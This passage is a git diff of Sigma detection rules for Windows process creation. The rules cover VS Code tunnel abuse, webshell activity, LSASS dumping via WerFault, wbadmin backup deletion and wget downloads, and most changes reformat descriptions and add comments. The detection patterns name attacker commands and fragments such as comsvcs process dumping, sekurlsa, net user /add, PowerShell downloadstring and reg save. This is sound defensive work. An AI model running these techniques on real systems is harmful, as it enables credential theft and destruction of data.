functionality to establish a C2 channel and execute arbitrary commands on the system. references: - https://ipfyx.fr/post/visual-studio-code-tunnel/ - https://badoption.eu/blog/2023/01/31/code_c2.html @@ -24,12 +22,13 @@ detection: selection_parent: ParentImage|contains: \servers\Stable- ParentImage|endswith: \server\node.exe - ParentCommandLine|contains: .vscode-server + ParentCommandLine|contains: .vscode-server # Technically one can host its own local server instead of using the VsCode one. And that would probably change the name (requires further research) + # Note: Child processes (ie: shells) can be whatever technically (with some efforts) selection_child_1: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: \terminal\browser\media\shellIntegration.ps1 + CommandLine|contains: \terminal\browser\media\shellIntegration.ps1 selection_child_2: Image|endswith: - \wsl.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml index 6d296b74e..54edcc719 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml @@ -1,8 +1,7 @@ title: Renamed Visual Studio Code Tunnel Execution id: 2cf29f11-e356-4f61-98c0-1bdb9393d6da status: experimental -description: Detects renamed Visual Studio Code tunnel execution. Attackers can abuse - this functionality to establish a C2 channel +description: Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel references: - https://ipfyx.fr/post/visual-studio-code-tunnel/ - https://badoption.eu/blog/2023/01/31/code_c2.html @@ -21,15 +20,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_image_only_tunnel: - OriginalFileName: null - CommandLine|endswith: .exe tunnel + OriginalFileName: + CommandLine|endswith: .exe tunnel selection_image_tunnel_args: - CommandLine|contains|all: + CommandLine|contains|all: - .exe tunnel - '--name ' - --accept-server-license-terms selection_image_tunnel_service: - CommandLine|contains|all: + CommandLine|contains|all: - 'tunnel ' - service - internal-run @@ -37,7 +36,7 @@ detection: selection_parent_tunnel: ParentCommandLine|endswith: ' tunnel' Image|endswith: \cmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - '/d /c ' - \servers\Stable- - code-server.cmd @@ -49,8 +48,7 @@ detection: Image|endswith: - \code-tunnel.exe - \code.exe - condition: process_creation and ((1 of selection_image_* and not 1 of filter_main_image_*) - or (1 of selection_parent_* and not 1 of filter_main_parent_*)) + condition: process_creation and ((1 of selection_image_* and not 1 of filter_main_image_*) or (1 of selection_parent_* and not 1 of filter_main_parent_*)) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_service_install.yml b/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_service_install.yml index 1525fd4d5..64166a629 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_service_install.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_service_install.yml @@ -20,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'tunnel ' - service - internal-run diff --git a/sigma/sysmon/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml b/sigma/sysmon/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml index e47d889f5..c4fcf2a16 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml @@ -1,8 +1,7 @@ title: Potential Binary Proxy Execution Via VSDiagnostics.EXE id: ac1c92b4-ac81-405a-9978-4604d78cc47e status: experimental -description: Detects execution of "VSDiagnostics.exe" with the "start" command in - order to launch and proxy arbitrary binaries. +description: Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries. references: - https://twitter.com/0xBoku/status/1679200664013135872 author: Nasreddine Bencherchali (Nextron Systems) @@ -19,12 +18,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \VSDiagnostics.exe - - OriginalFileName: VSDiagnostics.exe + - Image|endswith: \VSDiagnostics.exe + - OriginalFileName: VSDiagnostics.exe selection_cli_start: - CommandLine|contains: start + CommandLine|contains: start selection_cli_launch: - CommandLine|contains: + CommandLine|contains: - ' /launch:' - ' -launch:' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml b/sigma/sysmon/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml index 192b431d0..3deebfde3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml @@ -1,8 +1,7 @@ title: Suspicious Vsls-Agent Command With AgentExtensionPath Load id: 43103702-5886-11ed-9b6a-0242ac120002 status: test -description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with - a suspicious library load using the --agentExtensionPath parameter +description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter references: - https://twitter.com/bohops/status/1583916360404729857 author: bohops @@ -20,9 +19,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \vsls-agent.exe - CommandLine|contains: --agentExtensionPath + CommandLine|contains: --agentExtensionPath filter: - CommandLine|contains: Microsoft.VisualStudio.LiveShare.Agent. + CommandLine|contains: Microsoft.VisualStudio.LiveShare.Agent. condition: process_creation and (selection and not filter) fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_w32tm.yml b/sigma/sysmon/process_creation/proc_creation_win_w32tm.yml index 405119f79..dfa099683 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_w32tm.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_w32tm.yml @@ -1,8 +1,7 @@ title: Use of W32tm as Timer id: 6da2c9f5-7c53-401b-aacb-92c040ce1215 status: test -description: When configured with suitable command line arguments, w32tm can act as - a delay mechanism +description: When configured with suitable command line arguments, w32tm can act as a delay mechanism references: - https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md - https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains @@ -20,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_w32tm: - - Image|endswith: \w32tm.exe - - OriginalFileName: w32time.dll + - Image|endswith: \w32tm.exe + - OriginalFileName: w32time.dll selection_cmd: - CommandLine|contains|all: + CommandLine|contains|all: - /stripchart - '/computer:' - '/period:' diff --git a/sigma/sysmon/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml b/sigma/sysmon/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml index 601e0c395..4b95740f4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml @@ -1,8 +1,7 @@ title: Wab Execution From Non Default Location id: 395907ee-96e5-4666-af2e-2ca91688e151 status: test -description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft - Address Book Import Tool) from non default locations as seen with bumblebee activity +description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity references: - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime diff --git a/sigma/sysmon/process_creation/proc_creation_win_wab_unusual_parents.yml b/sigma/sysmon/process_creation/proc_creation_win_wab_unusual_parents.yml index c6a94e5aa..7d4202e37 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wab_unusual_parents.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wab_unusual_parents.yml @@ -1,9 +1,7 @@ title: Wab/Wabmig Unusual Parent Or Child Processes id: 63d1ccc0-2a43-4f4b-9289-361b308991ff status: test -description: Detects unusual parent or children of the wab.exe (Windows Contacts) - and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used - with bumblebee activity +description: Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity references: - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime @@ -24,16 +22,18 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_parent: ParentImage|endswith: + # Add more if known - \WmiPrvSE.exe - \svchost.exe - \dllhost.exe Image|endswith: - \wab.exe - - \wabmig.exe + - \wabmig.exe # (Microsoft Address Book Import Tool) selection_child: + # You can add specific suspicious child processes (such as cmd, powershell...) to increase the accuracy ParentImage|endswith: - \wab.exe - - \wabmig.exe + - \wabmig.exe # (Microsoft Address Book Import Tool) condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml b/sigma/sysmon/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml index 73816125c..c118c8371 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml @@ -1,13 +1,10 @@ title: SystemStateBackup Deleted Using Wbadmin.EXE id: 89f75308-5b1b-4390-b2d8-d6b2340efaf8 status: test -description: 'Deletes the Windows systemstatebackup using wbadmin.exe. - +description: | + Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. - This may only be successful on server platforms that have Windows Backup enabled. - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell author: frack113 @@ -25,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wbadmin.exe - - OriginalFileName: WBADMIN.EXE + - Image|endswith: \wbadmin.exe + - OriginalFileName: WBADMIN.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'delete ' - 'systemstatebackup ' - -keepVersions:0 diff --git a/sigma/sysmon/process_creation/proc_creation_win_webdav_lnk_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_webdav_lnk_execution.yml index 434d857f8..060957d67 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_webdav_lnk_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_webdav_lnk_execution.yml @@ -1,8 +1,8 @@ title: Potentially Suspicious WebDAV LNK Execution id: 1412aa78-a24c-4abd-83df-767dfb2c5bbe related: - - id: f0507c0f-a3a2-40f5-acc6-7f543c334993 - type: similar + - id: f0507c0f-a3a2-40f5-acc6-7f543c334993 + type: similar status: experimental description: Detects possible execution via LNK file accessed on a WebDAV server. references: @@ -31,7 +31,7 @@ detection: - \powershell.exe - \pwsh.exe - \wscript.exe - CommandLine|contains: \DavWWWRoot\ + CommandLine|contains: \DavWWWRoot\ condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_webshell_chopper.yml b/sigma/sysmon/process_creation/proc_creation_win_webshell_chopper.yml index 581261e71..d514bd01a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_webshell_chopper.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_webshell_chopper.yml @@ -1,8 +1,7 @@ title: Chopper Webshell Process Pattern id: fa3c117a-bc0d-416e-a31b-0c0e80653efb status: test -description: Detects patterns found in process executions cause by China Chopper like - tiny (ASPX) webshells +description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells references: - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/ author: Florian Roth (Nextron Systems), MSTI (query) @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_origin: - - Image|endswith: \w3wp.exe - - ParentImage|endswith: \w3wp.exe + - Image|endswith: \w3wp.exe + - ParentImage|endswith: \w3wp.exe selection_cmdline: - CommandLine|contains: + CommandLine|contains: - '&ipconfig&echo' - '&quser&echo' - '&whoami&echo' diff --git a/sigma/sysmon/process_creation/proc_creation_win_webshell_hacking.yml b/sigma/sysmon/process_creation/proc_creation_win_webshell_hacking.yml index 48d90c999..4ef678cf3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_webshell_hacking.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_webshell_hacking.yml @@ -1,11 +1,8 @@ title: Webshell Hacking Activity Patterns id: 4ebc877f-4612-45cb-b3a5-8e3834db36c9 status: test -description: 'Detects certain parent child patterns found in cases in which a web - shell is used to perform certain credential dumping or exfiltration activities - on a compromised system - - ' +description: | + Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system references: - https://youtu.be/7aemGhaE9ds?t=641 author: Florian Roth (Nextron Systems) @@ -22,6 +19,7 @@ logsource: category: process_creation product: windows detection: + # Webserver process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational @@ -44,52 +42,61 @@ detection: ParentImage|endswith: - \java.exe - \javaw.exe - CommandLine|contains: + CommandLine|contains: - catalina.jar - CATALINA_HOME + # Suspicious child processes selection_child_1: - CommandLine|contains|all: + # Process dumping + CommandLine|contains|all: - rundll32 - comsvcs selection_child_2: - CommandLine|contains|all: + # Winrar exfil + CommandLine|contains|all: - ' -hp' - ' a ' - ' -m' selection_child_3: - CommandLine|contains|all: + # User add + CommandLine|contains|all: - net - ' user ' - ' /add' selection_child_4: - CommandLine|contains|all: + CommandLine|contains|all: - net - ' localgroup ' - ' administrators ' - /add selection_child_5: Image|endswith: + # Credential stealing - \ntdsutil.exe + # AD recon - \ldifde.exe - \adfind.exe + # Process dumping - \procdump.exe - \Nanodump.exe + # Destruction / ransom groups - \vssadmin.exe - \fsutil.exe selection_child_6: - CommandLine|contains: - - ' -decode ' - - ' -NoP ' - - ' -W Hidden ' - - ' /decode ' - - ' /ticket:' - - ' sekurlsa' - - .dmp full - - .downloadfile( - - .downloadstring( - - FromBase64String - - process call create - - 'reg save ' + # SUspicious patterns + CommandLine|contains: + - ' -decode ' # Used with certutil + - ' -NoP ' # Often used in malicious PowerShell commands + - ' -W Hidden ' # Often used in malicious PowerShell commands + - ' /decode ' # Used with certutil + - ' /ticket:' # Rubeus + - ' sekurlsa' # Mimikatz + - .dmp full # Process dumping method apart from procdump + - .downloadfile( # PowerShell download command + - .downloadstring( # PowerShell download command + - FromBase64String # PowerShell encoded payload + - process call create # WMIC process creation + - 'reg save ' # save registry SAM - syskey extraction - whoami /priv condition: process_creation and (1 of selection_webserver_* and 1 of selection_child_*) falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml index 7f7e44dd8..7f1b09a0c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml @@ -1,8 +1,7 @@ title: Webshell Detection With Command Line Keywords id: bed2a484-9348-4143-8a8a-b801c979301c status: test -description: Detects certain command line parameters often used during reconnaissance - activity via web shells +description: Detects certain command line parameters often used during reconnaissance activity via web shells references: - https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html - https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/ @@ -42,65 +41,65 @@ detection: ParentImage|endswith: - \java.exe - \javaw.exe - CommandLine|contains: + CommandLine|contains: - catalina.jar - CATALINA_HOME selection_susp_net_utility: OriginalFileName: - net.exe - net1.exe - CommandLine|contains: + CommandLine|contains: - ' user ' - ' use ' - ' group ' selection_susp_ping_utility: OriginalFileName: ping.exe - CommandLine|contains: ' -n ' + CommandLine|contains: ' -n ' selection_susp_change_dir: - CommandLine|contains: - - '&cd&echo' - - 'cd /d ' + CommandLine|contains: + - '&cd&echo' # china chopper web shell + - 'cd /d ' # https://www.computerhope.com/cdhlp.htm selection_susp_wmic_utility: OriginalFileName: wmic.exe - CommandLine|contains: ' /node:' + CommandLine|contains: ' /node:' selection_susp_misc_discovery_binaries: - - Image|endswith: - - \dsquery.exe - - \find.exe - - \findstr.exe - - \ipconfig.exe - - \netstat.exe - - \nslookup.exe - - \pathping.exe - - \quser.exe - - \schtasks.exe - - \systeminfo.exe - - \tasklist.exe - - \tracert.exe - - \ver.exe - - \wevtutil.exe - - \whoami.exe - - OriginalFileName: - - dsquery.exe - - find.exe - - findstr.exe - - ipconfig.exe - - netstat.exe - - nslookup.exe - - pathping.exe - - quser.exe - - schtasks.exe - - sysinfo.exe - - tasklist.exe - - tracert.exe - - ver.exe - - VSSADMIN.EXE - - wevtutil.exe - - whoami.exe + - Image|endswith: + - \dsquery.exe + - \find.exe + - \findstr.exe + - \ipconfig.exe + - \netstat.exe + - \nslookup.exe + - \pathping.exe + - \quser.exe + - \schtasks.exe + - \systeminfo.exe + - \tasklist.exe + - \tracert.exe + - \ver.exe + - \wevtutil.exe + - \whoami.exe + - OriginalFileName: + - dsquery.exe + - find.exe + - findstr.exe + - ipconfig.exe + - netstat.exe + - nslookup.exe + - pathping.exe + - quser.exe + - schtasks.exe + - sysinfo.exe + - tasklist.exe + - tracert.exe + - ver.exe + - VSSADMIN.EXE + - wevtutil.exe + - whoami.exe selection_susp_misc_discovery_commands: - CommandLine|contains: + CommandLine|contains: - ' Test-NetConnection ' - - dir \ + - dir \ # remote dir: dir \\C$:\windows\temp\*.exe condition: process_creation and (1 of selection_webserver_* and 1 of selection_susp_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml b/sigma/sysmon/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml index 970b102d3..79ca39408 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml @@ -1,14 +1,11 @@ title: Suspicious Process By Web Server Process id: 8202070f-edeb-4d31-a010-a26c72ac5600 status: test -description: 'Detects potentially suspicious processes being spawned by a web server - process which could be the result of a successfully placed web shell or exploitation - - ' +description: | + Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation references: - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF -author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim - Shelton, Nasreddine Bencherchali (Nextron Systems) +author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) date: 2019/01/16 modified: 2023/11/11 tags: @@ -31,7 +28,7 @@ detection: - \php-cgi.exe - \php.exe - \tomcat.exe - - \UMWorkerProcess.exe + - \UMWorkerProcess.exe # https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html - \w3wp.exe - \ws_TomcatService.exe selection_webserver_characteristics_tomcat1: @@ -82,15 +79,13 @@ detection: - \wusa.exe filter_main_fp_1: ParentImage|endswith: \java.exe - CommandLine|endswith: Windows\system32\cmd.exe /c C:\ManageEngine\ADManager - "Plus\ES\bin\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt + CommandLine|endswith: Windows\system32\cmd.exe /c C:\ManageEngine\ADManager "Plus\ES\bin\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt filter_main_fp_2: ParentImage|endswith: \java.exe - CommandLine|contains|all: + CommandLine|contains|all: - sc query - ADManager Plus - condition: process_creation and (1 of selection_webserver_* and selection_anomaly_children - and not 1 of filter_main_*) + condition: process_creation and (1 of selection_webserver_* and selection_anomaly_children and not 1 of filter_main_*) falsepositives: - Particular web applications may spawn a shell process legitimately level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_webshell_tool_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_webshell_tool_recon.yml index 4f3b2865e..9de77e2e6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_webshell_tool_recon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_webshell_tool_recon.yml @@ -1,11 +1,8 @@ title: Webshell Tool Reconnaissance Activity id: f64e5c19-879c-4bae-b471-6d84c8339677 status: test -description: 'Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) - that perform reconnaissance looking for the existence of popular scripting tools - (perl, python, wget) on the system via the help commands - - ' +description: | + Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands references: - https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html author: Cian Heasley, Florian Roth (Nextron Systems) @@ -41,11 +38,11 @@ detection: ParentImage|endswith: - \java.exe - \javaw.exe - CommandLine|contains: + CommandLine|contains: - CATALINA_HOME - catalina.jar selection_recon: - CommandLine|contains: + CommandLine|contains: - perl --help - perl -h - python --help diff --git a/sigma/sysmon/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml b/sigma/sysmon/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml index 784aa29ec..62f411bed 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml @@ -1,8 +1,7 @@ title: Potential Credential Dumping Via WER id: 9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3 status: test -description: Detects potential credential dumping via Windows Error Reporting LSASS - Shtinkering technique which uses the Windows Error Reporting to dump lsass +description: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass references: - https://github.com/deepinstinct/Lsass-Shtinkering - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf @@ -21,16 +20,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \Werfault.exe - - OriginalFileName: WerFault.exe + - Image|endswith: \Werfault.exe + - OriginalFileName: WerFault.exe selection_cli: - ParentUser|contains: + ParentUser|contains: # covers many language settings - AUTHORI - AUTORI User|contains: - AUTHORI - AUTORI - CommandLine|contains|all: + CommandLine|contains|all: + # Doc: WerFault.exe -u -p -ip -s + # Example: C:\Windows\system32\Werfault.exe -u -p 744 -ip 1112 -s 244 + # If the source process is not equal to the target process and the target process is LSASS then this is an indication of this technique + # Example: If the "-p" points the PID of "lsass.exe" and "-ip" points to a different process than "lsass.exe" then this is a sign of malicious activity - ' -u -p ' - ' -ip ' - ' -s ' @@ -38,7 +41,6 @@ detection: ParentImage: C:\Windows\System32\lsass.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - Windows Error Reporting might produce similar behavior. In that case, check - the PID associated with the "-p" parameter in the CommandLine. + - Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the "-p" parameter in the CommandLine. level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml index 2f9b0b0fd..f6ebaa882 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml @@ -1,12 +1,10 @@ title: Potential ReflectDebugger Content Execution Via WerFault.EXE id: fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd related: - - id: 0cf2e1c6-8d10-4273-8059-738778f981ad - type: derived + - id: 0cf2e1c6-8d10-4273-8059-738778f981ad + type: derived status: experimental -description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that - is used to run files stored in the ReflectDebugger key which could be used to - store the path to the malware in order to masquerade the execution flow +description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow references: - https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html - https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/ @@ -25,10 +23,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \WerFault.exe - - OriginalFileName: WerFault.exe + - Image|endswith: \WerFault.exe + - OriginalFileName: WerFault.exe selection_cli: - CommandLine|contains: ' -pr ' + CommandLine|contains: ' -pr ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_wermgr_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_wermgr_susp_child_process.yml index 9245629b4..77b2c02c1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wermgr_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wermgr_susp_child_process.yml @@ -1,11 +1,10 @@ title: Suspicious Child Process Of Wermgr.EXE id: 396f6630-f3ac-44e3-bfc8-1b161bc00c4e related: - - id: 5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5 - type: similar + - id: 5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5 + type: similar status: experimental -description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child - process +description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process references: - https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html - https://www.echotrail.io/insights/search/wermgr.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_wermgr_susp_exec_location.yml b/sigma/sysmon/process_creation/proc_creation_win_wermgr_susp_exec_location.yml index 0ef7fba80..88cb3fa45 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wermgr_susp_exec_location.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wermgr_susp_exec_location.yml @@ -1,11 +1,10 @@ title: Suspicious Execution Location Of Wermgr.EXE id: 5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5 related: - - id: 396f6630-f3ac-44e3-bfc8-1b161bc00c4e - type: similar + - id: 396f6630-f3ac-44e3-bfc8-1b161bc00c4e + type: similar status: experimental -description: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution - location. +description: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location. references: - https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html - https://www.echotrail.io/insights/search/wermgr.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_wget_download_direct_ip.yml b/sigma/sysmon/process_creation/proc_creation_win_wget_download_direct_ip.yml index 3f93f1f89..03893c0cb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wget_download_direct_ip.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wget_download_direct_ip.yml @@ -1,8 +1,7 @@ title: Suspicious File Download From IP Via Wget.EXE id: 17f0c0a8-8bd5-4ee0-8c5f-a342c0199f35 status: experimental -description: Detects potentially suspicious file downloads directly from IP addresses - using Wget.exe +description: Detects potentially suspicious file downloads directly from IP addresses using Wget.exe references: - https://www.gnu.org/software/wget/manual/wget.html author: Nasreddine Bencherchali (Nextron Systems) @@ -18,17 +17,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wget.exe - - OriginalFileName: wget.exe + - Image|endswith: \wget.exe + - OriginalFileName: wget.exe selection_ip: - CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} + CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_flag: - - CommandLine|re: \s-O\s - - CommandLine|contains: --output-document + - CommandLine|re: \s-O\s + - CommandLine|contains: --output-document selection_ext: - CommandLine|endswith: + CommandLine|endswith: - .ps1 - .ps1' - .ps1" diff --git a/sigma/sysmon/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml b/sigma/sysmon/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml index 874e3ef92..390e98c05 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml @@ -1,8 +1,7 @@ title: Suspicious File Download From File Sharing Domain Via Wget.EXE id: a0d7e4d2-bede-4141-8896-bc6e237e977c status: experimental -description: Detects potentially suspicious file downloads from file sharing domains - using wget.exe +description: Detects potentially suspicious file downloads from file sharing domains using wget.exe references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv @@ -20,11 +19,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wget.exe - - OriginalFileName: wget.exe + - Image|endswith: \wget.exe + - OriginalFileName: wget.exe selection_websites: - CommandLine|contains: 